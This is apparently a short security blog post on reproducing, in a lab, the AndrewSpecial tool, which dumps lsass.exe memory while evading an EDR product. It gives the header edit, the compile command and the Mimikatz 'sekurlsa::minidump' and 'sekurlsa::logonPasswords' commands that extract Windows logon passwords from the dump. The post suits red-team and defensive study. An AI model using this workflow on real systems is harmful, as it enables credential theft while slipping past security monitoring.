AndrewSpecial – stealthy lsass.exe memory dumping

Ultra short entry here. When reading a very interesting article on bypassing one End Point Security product to silently dump lsass.exe without getting detected  https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6

One will want to reproduce the steps of course and since the code is available here :

https://github.com/hoangprod/AndrewSpecial/tree/master

I have just done that in my lab.

Below might save some seconds if one gets stuck compiling it. (I have used Visual Studio 2013 on Win7 SP1 64bit to build it)

# On Windows build server just download the master.zip 
https://github.com/hoangprod/AndrewSpecial/archive/master.zip


Modify AndrewSpecial.h to include the additional #pragma comment (lib, “advapi32.lib”)

#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <DbgHelp.h>

#pragma comment (lib, "Dbghelp.lib")
#pragma comment (lib, "ntdll.lib")
#pragma comment (lib, "advapi32.lib")

void getversion_long();
bool AndrewSpecial(const wchar_t * ProcessName);
EXTERN_C NTSTATUS NTAPI NtReadVirtualMemory(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* RtlGetVersion_t)(_Out_ PRTL_OSVERSIONINFOW lpVersionInformation);

enum supported_versions
{
win8 = 0x060200,
win81 = 0x060300,
win10 = 0x0A0000,
};

Open up the 64bit VS2013 x64 Native Tools Command Prompt  and cd to the source directory

cl *.cpp /DUNICODE

Next we transfer the compiled Andrew.exe binary to our testing lab Windows 10 box and execute it

The resulting Andrew.dmp can be fed to a separate instance of Mimikatz on some other machine as follows

mimikatz # sekurlsa::minidump Andrew.dmp
mimikatz # sekurlsa::logonPasswords

Courtesy of CaledoniaProject

https://github.com/hoangprod/AndrewSpecial/pull/1/commits/0320bf38ad02aa8b000b8095be35242b826d0f64

About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.